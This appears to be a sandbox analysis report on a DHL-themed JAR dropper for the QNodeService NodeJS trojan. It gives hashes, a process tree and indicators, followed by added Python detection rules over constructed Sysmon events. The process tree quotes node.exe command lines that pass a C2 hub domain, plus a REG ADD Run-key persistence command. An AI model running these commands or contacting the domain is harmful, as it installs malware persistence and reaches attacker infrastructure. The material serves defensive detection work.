Analysis
max time kernel: 34s
max time network: 126s
platform: windows10_x64
resource: win10
submitted: 19-10-2020 10:25
Static task: static1
Behavioral task: behavioral1
  Sample: DHL_109401211_AWB09100903_12012900.jar
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: DHL_109401211_AWB09100903_12012900.jar
  Resource: win10
General
Target: DHL_109401211_AWB09100903_12012900.jar
Size: 70KB
MD5: 5b63a9bcee6e5f189d25cf270b579d05
SHA1: b3e0e86aff8fb3b156ebb53fc11153ae6c5d388b
SHA256: bffaedde078cf79c57bef9992503d088d21ea51957558a63e510b973c1e6f5fb
SHA512: c088674ff3c470cfa3ca86ac8bb4c8aa873434a98f2de4a35ec9afa63ce88f2cf0726dd54f9b143cd3b686bceb784e933d35f8636fb800ae946890f7ee96693f
Malware Config
Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
pid   Process
3736  node.exe
1500  node.exe
1872  node.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef9c4691-b599-4409-9601-da6cc8dc66ae = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe

JavaScript code in executable (3 IoCs)
resource | yara_rule
behavioral2/files/0x000100000001ad9e-171.dat | js
behavioral2/files/0x000100000001ad9e-175.dat | js
behavioral2/files/0x000100000001ad9e-179.dat | js

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
20 | wtfismyip.com
21 | wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments. Caveat: on Windows, Node's own os.cpus() (libuv uv_cpu_info) reads ~MHz and ProcessorNameString from exactly these CentralProcessor keys, so this hit is consistent with ordinary Node.js runtime behaviour and is weak evidence on its own; the persistence, process-chain and network signatures carry the weight in this report.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid   Process   occurrences
3736  node.exe  4
1500  node.exe  4
1872  node.exe  10

Suspicious use of WriteProcessMemory (12 IoCs; each entry was logged twice, shown once here)
description | pid | Process | procid_target
PID 3588 wrote to memory of 2452 | 3588 | java.exe | 74
PID 2452 wrote to memory of 3736 | 2452 | javaw.exe | 78
PID 3736 wrote to memory of 1500 | 3736 | node.exe | 80
PID 1500 wrote to memory of 1872 | 1500 | node.exe | 81
PID 1872 wrote to memory of 2420 | 1872 | node.exe | 83
PID 2420 wrote to memory of 736 | 2420 | cmd.exe | 84
Processes

1. C:\ProgramData\Oracle\Java\javapath\java.exe
   java -jar C:\Users\Admin\AppData\Local\Temp\DHL_109401211_AWB09100903_12012900.jar
   - Suspicious use of WriteProcessMemory
   PID: 3588

  2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
     "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\c79dc872.tmp
     - Suspicious use of WriteProcessMemory
     PID: 2452

    3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
       C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory
       PID: 3736

      4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_4ByXym\boot.js --hub-domain glotronic.net
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
         PID: 1500

        5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_4ByXym\boot.js --hub-domain glotronic.net
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
           PID: 1872

          6. C:\Windows\system32\cmd.exe
             C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ef9c4691-b599-4409-9601-da6cc8dc66ae" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             - Suspicious use of WriteProcessMemory
             PID: 2420

            7. C:\Windows\system32\reg.exe
               REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ef9c4691-b599-4409-9601-da6cc8dc66ae" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               - Adds Run key to start application
               PID: 736

Note on stage 3: a script argument of "-" makes node.exe read its program from stdin, so the first Node stage is fed by the javaw.exe parent rather than loaded from a file on disk; stages 4 and 5 then run boot.js from the temp directory, and the persistence entry points at a separate boot.vbs under C:\Users\Admin\qhub\node\2.0.10.
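The chain above lends itself to a few host-level detections that do not depend on the sample's hashes. The following is an added example, not part of the sandbox report or of any vendor's rule set: it encodes the process tree, the Run-key write and the wtfismyip.com query as constructed Sysmon-style records (field names approximate Event IDs 1, 13 and 22; a stock Node.js process is included as a benign control; every IP-lookup domain other than wtfismyip.com is an assumed watch-list entry) and runs five rules over them, including a parent-chain walk that flags node.exe descending from a Java launcher.

```python
"""Detection logic for the QNodeService chain in this report, over constructed
Sysmon-style events. Example code added to this page; not from the sandbox
report or any vendor. Field names approximate Sysmon Event ID 1 (process
creation), 13 (registry value set) and 22 (DNS query)."""
import re

# Reasons a rule can return; triage code matches on these strings.
R_RUNKEY = "Run key value launches a script via cmd /C or has a GUID name"
R_NODEPATH = "node.exe running outside the standard Node.js install path"
R_HUB = "node.exe started with --hub-domain (QNodeService launcher argument)"
R_IPLOOKUP = "DNS query to an external IP lookup service"
R_JAVACHAIN = "node.exe descended from a Java launcher"

GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd)\b", re.I)
CMD_SLASH_C_RE = re.compile(r"\bcmd(\.exe)?\b.*\s/c\s", re.I)
NODE_INSTALL_DIRS = ("c:\\program files\\nodejs\\", "c:\\program files (x86)\\nodejs\\")
# Assumed watch-list; wtfismyip.com is the only one this report observed.
IP_LOOKUP_DOMAINS = {"wtfismyip.com", "api.ipify.org", "icanhazip.com", "ifconfig.me"}

NODE = r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe"
BOOT = r"C:\Users\Admin\AppData\Local\Temp\_qhub_node_4ByXym\boot.js"
REG_CMD = (r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
           r'/V "ef9c4691-b599-4409-9601-da6cc8dc66ae" /t REG_SZ /F '
           r'/D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""')


def proc(pid, ppid, image, cmd):
    return {"id": 1, "pid": pid, "ppid": ppid, "image": image, "cmd": cmd}


EVENTS = [  # constructed from the process tree and IoC tables in the report
    proc(3588, 1000, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
         r"java -jar C:\Users\Admin\AppData\Local\Temp\DHL_109401211_AWB09100903_12012900.jar"),
    proc(2452, 3588, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
         r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\c79dc872.tmp'),
    proc(3736, 2452, NODE, NODE + " - --hub-domain glotronic.net"),
    proc(1500, 3736, NODE, f"{NODE} {BOOT} --hub-domain glotronic.net"),
    proc(1872, 1500, NODE, f"{NODE} {BOOT} --hub-domain glotronic.net"),
    proc(2420, 1872, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /d /s /c "' + REG_CMD + '"'),
    proc(736, 2420, r"C:\Windows\system32\reg.exe", REG_CMD),
    {"id": 13, "pid": 736, "image": r"C:\Windows\system32\reg.exe",
     "target": r"HKU\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef9c4691-b599-4409-9601-da6cc8dc66ae",
     "details": r'cmd /D /C "C:\Users\Admin\qhub\node\2.0.10\boot.vbs"'},
    {"id": 22, "pid": 1872, "image": NODE, "query": "wtfismyip.com"},
    # Benign control: a stock Node.js install running a local script (constructed).
    proc(4100, 1000, r"C:\Program Files\nodejs\node.exe", r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js'),
]


def is_node(ev):
    return ev["id"] == 1 and ev["image"].lower().endswith("\\node.exe")


def suspicious_run_value(ev):
    """Event 13: Run-key value whose data runs a script through cmd /C, or whose name is a bare GUID."""
    if ev["id"] != 13:
        return None
    m = RUN_KEY_RE.search(ev["target"])
    if not m:
        return None
    data = ev["details"]
    if GUID_RE.match(m.group(1)) or (CMD_SLASH_C_RE.search(data) and SCRIPT_EXT_RE.search(data)):
        return R_RUNKEY
    return None


def node_outside_install_dir(ev):
    """Event 1: node.exe whose image is not under the installer's Program Files path."""
    if is_node(ev) and not ev["image"].lower().startswith(NODE_INSTALL_DIRS):
        return R_NODEPATH
    return None


def hub_domain_argument(ev):
    return R_HUB if is_node(ev) and "--hub-domain" in ev["cmd"] else None


def external_ip_lookup(ev):
    if ev["id"] == 22 and ev["query"].lower().rstrip(".") in IP_LOOKUP_DOMAINS:
        return R_IPLOOKUP
    return None


def ancestry(events, pid):
    """Image basenames from pid up to the root, e.g. ['reg.exe', 'cmd.exe', ..., 'java.exe']."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain = []
    while pid in by_pid and len(chain) < 64:  # depth cap guards against pid-reuse loops
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, reason) pairs; a pid with several reasons goes to the top of the triage queue."""
    hits = []
    for ev in events:
        for rule in (suspicious_run_value, node_outside_install_dir, hub_domain_argument, external_ip_lookup):
            reason = rule(ev)
            if reason:
                hits.append((ev["pid"], reason))
        if is_node(ev) and {"java.exe", "javaw.exe"} & set(ancestry(events, ev["pid"])[1:]):
            hits.append((ev["pid"], R_JAVACHAIN))
    return hits


if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The node-path rule alone will also fire on legitimate portable or nvm-style installs under a user profile, which is why it is paired with the parent-chain rule: a Node binary spawned (directly or through intermediate node.exe stages) by java.exe or javaw.exe is the shape of this downloader and has no common benign counterpart. The Run-key rule keys on two properties of the entry reg.exe wrote here, a GUID value name and a cmd /C wrapper around a .vbs, rather than on the sample's specific path.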